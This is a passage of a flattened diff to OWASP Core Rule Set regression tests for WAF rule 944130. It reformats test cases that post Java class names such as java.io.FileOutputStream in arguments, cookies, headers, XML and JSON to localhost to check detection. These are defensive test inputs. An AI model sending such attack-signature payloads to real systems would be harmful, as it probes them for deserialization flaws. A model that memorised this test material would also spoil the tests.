agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" 
+ output: + log: + expect_ids: [944130] + - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": 
\"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-120 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" 
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: 
+ expect_ids: [944130] + - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
